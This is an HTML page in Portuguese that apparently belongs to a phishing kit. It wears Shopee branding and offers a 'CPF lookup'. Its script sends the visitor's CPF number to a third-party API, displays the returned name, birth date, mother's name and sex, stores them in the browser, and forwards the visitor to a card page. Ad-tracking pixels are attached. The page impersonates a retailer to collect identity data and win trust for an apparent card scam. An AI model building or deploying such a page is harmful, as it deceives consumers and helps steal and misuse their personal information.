<!DOCTYPE html><html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Consulta de CPF</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&amp;display=swap" rel="stylesheet">





 

 <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

<script async="" defer="" src="js/pixel.js"></script>

    <style>
        body {
            font-family: 'Poppins', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: #ffffff;
            padding: 20px;
            text-align: center;
            border-bottom: 3px solid #ee4d2d;
        }

        .header img {
            width: 150px;
        }

        .main-content {
            max-width: 500px;
            background: #fff;
            margin: 50px auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: #ee4d2d;
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: white !important;
            background-color: #000 !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background: #ffffff;
            border-top: 1px solid #e6e6e6;
            text-align: center;
            padding: 15px;
            font-size: 10px;
            color: #666;
            margin-top: auto;
        }

        .result-box {
            margin-top: 20px;
            background-color: #f9f9f9;
            border: 1px solid #e6e6e6;
            border-radius: 8px;
            padding: 15px;
            display: none;
            text-align: left;
        }

        .result-box p {
            margin: 0 0 10px;
        }

        .loader {
            display: none;
            text-align: center;
            margin-bottom: 15px;
        }

        .loader img {
            width: 50px;
            height: 50px;
        }

        .success-message {
            text-align: center;
            font-weight: bold;
            color: green;
            margin-bottom: 15px;
        }

        .success-message img {
            width: 50px;
            height: 50px;
            display: block;
            margin: 0 auto 10px;
        }
    </style>
</head>
<body>
    <!-- Header -->
    <div class="header">
        <img src="https://logodownload.org/wp-content/uploads/2021/03/shopee-logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
        <p style="color:gray; text-align:initial">Preencha o CPF para consulta</p>
        <form id="cadastroForm" style="text-align:initial">
            <div class="mb-3">
                <label for="cpf" class="form-label" style="color:gray; font-size:13px">CPF</label>
                <input type="text" class="form-control" id="cpf" placeholder="000.000.000-00">
            </div>
        </form>
        <button id="consultarBtn" class="btn-custom" onclick="submitLog()">Consultar CPF</button>
        <div id="loader" class="loader">
            <img src="https://cdn.pixabay.com/animation/2023/08/11/21/18/21-18-05-265_512.gif" alt="Carregando...">
            <p>Consultando seus dados...</p>
        </div>

        <!-- Resultado -->
        <div id="resultBox" class="result-box">
            <div class="success-message">
                <img src="https://cdn-icons-png.flaticon.com/512/6784/6784655.png" alt="Aprovado">
                <p>Dados encontrados com sucesso!</p>
            </div>
            <p>Iniciando cadastro de <strong><span id="nomeCompleto"></span></strong></p>
            <p><strong>Data de Nascimento:</strong> <span id="dataNascimento"></span></p>
            <p><strong>Nome da M&atilde;e:</strong> <span id="nomeMae"></span></p>
            <p><strong>Sexo:</strong> <span id="sexo"></span></p>
            <button class="btn-custom" onclick="continuar()">Continuar</button>
        </div>
    </div>

    <!-- Script -->
    <script>
        async function getCPF(strCPF) {
            const url = `https://api.centralda20.com/consultar/${strCPF}`;
            const res = await fetch(url);
            return await res.json();
        }

        function validaCPF(strCPF) {
            let Soma = 0;
            let Resto;
            if (strCPF == "00000000000") return false;

            for (let i = 1; i <= 9; i++) Soma += parseInt(strCPF.substring(i - 1, i)) * (11 - i);
            Resto = (Soma * 10) % 11;

            if ((Resto == 10) || (Resto == 11)) Resto = 0;
            if (Resto != parseInt(strCPF.substring(9, 10))) return false;

            Soma = 0;
            for (let i = 1; i <= 10; i++) Soma += parseInt(strCPF.substring(i - 1, i)) * (12 - i);
            Resto = (Soma * 10) % 11;

            if ((Resto == 10) || (Resto == 11)) Resto = 0;
            if (Resto != parseInt(strCPF.substring(10, 11))) return false;
            return true;
        }

        async function submitLog() {
            const cpf = document.getElementById("cpf").value.replace(/-/g, "").replace(/\./g, "");
            const loader = document.getElementById("loader");
            const resultBox = document.getElementById("resultBox");
            const consultarBtn = document.getElementById("consultarBtn");

            if (!validaCPF(cpf)) {
                alert("CPF inv\u00e1lido!");
                return;
            }

            loader.style.display = "block";
            consultarBtn.style.display = "none";
            resultBox.style.display = "none";

            try {
                const responseCPF = await getCPF(cpf);

                setTimeout(() => {
                    const nomeCompleto = responseCPF.NOME || "Nao encontrado";
                    const dataNasc = responseCPF.NASC || "Nao encontrada";
                    const nomeMae = responseCPF.NOME_MAE || "Nao encontrado";
                    const sexo = responseCPF.SEXO || "Nao encontrado";

                    document.getElementById("nomeCompleto").innerText = nomeCompleto;
                    document.getElementById("dataNascimento").innerText = dataNasc;
                    document.getElementById("nomeMae").innerText = nomeMae;
                    document.getElementById("sexo").innerText = sexo;

                    // Salvar os dados no localStorage
                    localStorage.setItem("dadosCPF", JSON.stringify({
                        nomeCompleto,
                        dataNascimento: dataNasc,
                        nomeMae,
                        sexo
                    }));

                    loader.style.display = "none";
                    resultBox.style.display = "block";
                }, 3000);
            } catch (error) {
                console.error("Erro na consulta:", error);
                alert("Erro ao consultar o CPF. Tente novamente.");
                loader.style.display = "none";
                consultarBtn.style.display = "block";
            }
        }

        function continuar() {
            window.location.href = "card.html";
        }
    </script>

    <!-- Footer -->
    <div class="footer">
Copyright &copy; 2025 Shopee. Todos os direitos reservados.<br>

Pol&iacute;tica de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>
<script>
  window.pixelId = "678cfeb1f88ec79c864bc9dc";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "../../cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

</body>

</html>